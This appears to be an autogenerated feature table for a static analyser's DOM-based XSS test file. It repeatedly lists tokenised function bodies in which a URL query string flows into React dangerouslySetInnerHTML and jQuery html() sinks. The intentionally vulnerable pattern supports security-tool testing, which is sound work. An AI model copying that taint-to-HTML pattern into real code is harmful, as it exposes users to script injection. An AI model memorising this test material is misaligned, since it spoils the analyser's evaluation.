autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:238:10:238:27 | tainted2={tainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:238:20:238:26 | tainted | assignedToPropName | tainted2 | +| autogenerated/Xss/DomBasedXss/tst.js:238:20:238:26 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:238:20:238:26 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:238:20:238:26 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:238:20:238:26 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:238:20:238:26 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | exceptional return of new C2( ... inted}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | exceptional return of new C2( ... inted}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | exceptional return of new C2( ... inted}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | exceptional return of new C2( ... inted}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | exceptional return of new C2( ... inted}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | new C2( ... inted}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | new C2( ... inted}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | new C2( ... inted}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | new C2( ... inted}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:5:240:31 | new C2( ... inted}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:9:240:10 | C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:9:240:10 | C2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:240:9:240:10 | C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:9:240:10 | C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:9:240:10 | C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:12:240:30 | {tainted3: tainted} | CalleeFlexibleAccessPath | C2 | +| autogenerated/Xss/DomBasedXss/tst.js:240:12:240:30 | {tainted3: tainted} | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:240:12:240:30 | {tainted3: tainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:12:240:30 | {tainted3: tainted} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:240:12:240:30 | {tainted3: tainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:12:240:30 | {tainted3: tainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:12:240:30 | {tainted3: tainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:20 | tainted3 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:20 | tainted3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:20 | tainted3 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:20 | tainted3 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:20 | tainted3 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:13:240:29 | tainted3: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | CalleeFlexibleAccessPath | C2 | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | InputAccessPathFromCallee | ?.tainted3 | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | assignedToPropName | tainted3 | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:240:23:240:29 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | exceptional return of new C2( ... inted}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | exceptional return of new C2( ... inted}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | exceptional return of new C2( ... inted}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | exceptional return of new C2( ... inted}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | exceptional return of new C2( ... inted}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | new C2( ... inted}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | new C2( ... inted}) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | new C2( ... inted}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | new C2( ... inted}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:5:241:31 | new C2( ... inted}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:9:241:10 | C2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:9:241:10 | C2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:241:9:241:10 | C2 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:9:241:10 | C2 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:9:241:10 | C2 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:12:241:30 | {tainted4: tainted} | CalleeFlexibleAccessPath | C2 | +| autogenerated/Xss/DomBasedXss/tst.js:241:12:241:30 | {tainted4: tainted} | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:241:12:241:30 | {tainted4: tainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:12:241:30 | {tainted4: tainted} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:241:12:241:30 | {tainted4: tainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:12:241:30 | {tainted4: tainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:12:241:30 | {tainted4: tainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:20 | tainted4 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:20 | tainted4 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:20 | tainted4 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:20 | tainted4 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:20 | tainted4 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:241:13:241:29 | tainted4: tainted | contextFunctionInterfaces | 